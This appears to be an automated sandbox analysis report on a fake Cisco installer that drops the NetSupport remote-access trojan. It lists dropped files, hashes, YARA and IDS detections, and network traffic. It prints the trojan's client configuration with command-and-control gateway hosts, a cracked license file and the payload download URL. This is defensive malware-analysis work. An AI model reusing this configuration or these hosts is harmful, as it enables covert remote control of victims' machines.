                                                                                                                                                                                                  SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                                                                                  MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                                                                                  SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                                                                                  SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                                                                                  SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):259
                                                                                                                                                                                                  Entropy (8bit):5.103526864179364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                                                                                                  MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                                                                                                                  SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                                                                                                  SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                                                                                                  SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18808
                                                                                                                                                                                                  Entropy (8bit):6.22028391196942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                                                                                  MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                                                                                  SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                                                                                  SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                                                                                  SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3642864
                                                                                                                                                                                                  Entropy (8bit):6.5156874906689275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                                                                                                  MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                                                                                                  SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                                                                                                  SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
                                                                                                                                                                                                  SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):459760
                                                                                                                                                                                                  Entropy (8bit):6.678291257338415
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                                                                                                  MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                                                                                                  SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                                                                                                  SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                                                                                                  SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121304
                                                                                                                                                                                                  Entropy (8bit):6.150456878585649
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                                                                                                  MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                                                                                                  SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                                                                                                  SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):638
                                                                                                                                                                                                  Entropy (8bit):5.396410176198281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                                                                                                  MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
                                                                                                                                                                                                  SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                                                                                                  SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                                                                                                  SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):773968
                                                                                                                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33144
                                                                                                                                                                                                  Entropy (8bit):6.737780491933496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                                                                  MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                                                                  SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                                                                  SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                                                                  SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72584
                                                                                                                                                                                                  Entropy (8bit):6.671736046146569
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                                                                                                  MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                                                                                                  SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                                                                                                  SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                                                                                                  SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2275903
                                                                                                                                                                                                  Entropy (8bit):7.997003172118591
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                                                                                                  MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                                                                                                  SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                                                                                                  SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                                                                                                  SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv*....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g..*_..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIM*M..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8|.a@ (.D..E1...$,B.[.@.\A.`@..D..*1F.K..P...m.u_*.hk....Z..j...TQ.|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):26020
                                                                                                                                                                                                  Entropy (8bit):2.2476892905217682
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:peTlrQoyJHNMnqlABUXvr3TwKUZZMHOEid0u:GlOkqlUUXvr3TbOE40u
                                                                                                                                                                                                  MD5:AE05BE0595EEDB094F4495C844DDBFC4
                                                                                                                                                                                                  SHA1:F486E75025ED048BBEC678058FBB971D35396214
                                                                                                                                                                                                  SHA-256:5E2993F202BD04B1F9C71EB9B227F4CC807827DB4E2E8F105196FBE074C15C98
                                                                                                                                                                                                  SHA-512:76F5FA0E53CAC062E26761AFB67F7C207CEE1698A9028D4EA3FD3B6713ABB23C0064788D03D776BCB61AEA7780623B9E9B832EB43A12AD3725A49267192DB296
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:--2024-10-31 13:05:19-- https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe..Resolving asknetsupertech.com (asknetsupertech.com)... 54.37.62.77..Connecting to asknetsupertech.com (asknetsupertech.com)|54.37.62.77|:443... connected...HTTP request sent, awaiting response... 200 OK..Length: 16877888 (16M) [application/x-msdownload]..Saving to: 'C:/Users/user/Desktop/download/CiscoSetup.exe'.... 0K .......... .......... .......... .......... .......... 0% 139K 1m58s.. 50K .......... .......... .......... .......... .......... 0% 291K 87s.. 100K .......... .......... .......... .......... .......... 0% 2.61M 60s.. 150K .......... .......... .......... .......... .......... 1% 304K 58s.. 200K .......... .......... .......... .......... .......... 1% 1.79M 48s.. 250K .......... .......... .......... .......... .......... 1% 2.05M 41s.. 300K .......... .......... .......... .......... .......... 2% 2.03M 36s.. 350K ...
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wget.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16877888
                                                                                                                                                                                                  Entropy (8bit):7.977972473710182
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:393216:PexFZAWTc+MZ3mOvSY6oDXtVVFOzWt8zLDVi:+AL+WmOvS9qDSzHzL0
                                                                                                                                                                                                  MD5:91F7229586DF2C577A54AD0D1A5BDCB1
                                                                                                                                                                                                  SHA1:938B4DDF983E035130A7FCBF0458C4F9D5B69CA5
                                                                                                                                                                                                  SHA-256:80F7768CBF016AE16F5758E31D9EB2D277C0566654F05BAD152ECBDE6EB616E5
                                                                                                                                                                                                  SHA-512:089EC05F751306B994EB1265245961C2F51B89679F4B70C08A0404FCFD7D6D6DEEC8133EE5F3F04E82D7272EC4C95BEE3859FA9C74BE0B96966C569FEF258C0E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t........................@.................................c}....@......@...................p..q....P..........|M...........`..@)...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...|M.......N..................@..@....................................@..@................
                                                                                                                                                                                                  No static file info
                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                  2024-10-31T18:05:13.649480+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.11.2049756151.236.16.15443TCP
                                                                                                                                                                                                  2024-10-31T18:05:13.649480+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.11.2049758199.188.200.195443TCP
                                                                                                                                                                                                  2024-10-31T18:05:21.486338+01002021697ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious1192.168.11.204975554.37.62.77443TCP
                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.750072002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.750154018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.750370026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.752455950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.752474070 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.112602949 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.112837076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.114099026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.114115953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.114476919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.116076946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.160013914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.486339092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.539391994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657820940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657834053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657905102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657917976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657989025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658030033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658190966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658202887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658202887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658202887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658401966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658592939 CET4434975554.37.62.77192.168.11.20
